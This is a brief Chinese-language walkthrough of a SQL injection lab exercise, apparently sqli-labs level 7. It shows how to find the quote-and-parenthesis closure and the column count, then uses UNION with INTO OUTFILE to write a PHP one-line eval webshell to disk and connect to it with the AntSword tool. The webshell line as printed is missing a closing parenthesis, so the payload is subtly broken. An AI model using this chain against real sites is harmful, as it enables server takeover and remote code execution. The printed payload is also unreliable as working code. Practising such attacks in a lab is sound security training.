SQL语句可以将指定内容写进文件里
1、into outfile 写文件
select 'xxxxx' into outfile '文件路径';
单个反斜杠 \t 出现了转义使语句无法执行,改为用双反斜杠即可
2、load_file() 读取本地文件 select load_file('要读取的文件路径');
下面开始第七关的练习:
1、输入id=1,出现提示use outfile
2、分析闭合方式
添加单引号报错,所以闭合方式为单引号
判断括号个数 ,id=1'))--+闭合成功
3、判断列数
order by 3成功回显,order by 4报错,所以有三列
4、使用联合查询语句和into outfile函数写入一些信息试试
打开文件夹显示信息已经写入指定位置,并且把前面的信息带出来了,把id值置换为空(id=-1)则不会出现该情况
将写入的信息换为一句话木马 <?php @eval($_POST["pass"];?>
直接访问看看
用蚁剑连接,连接成功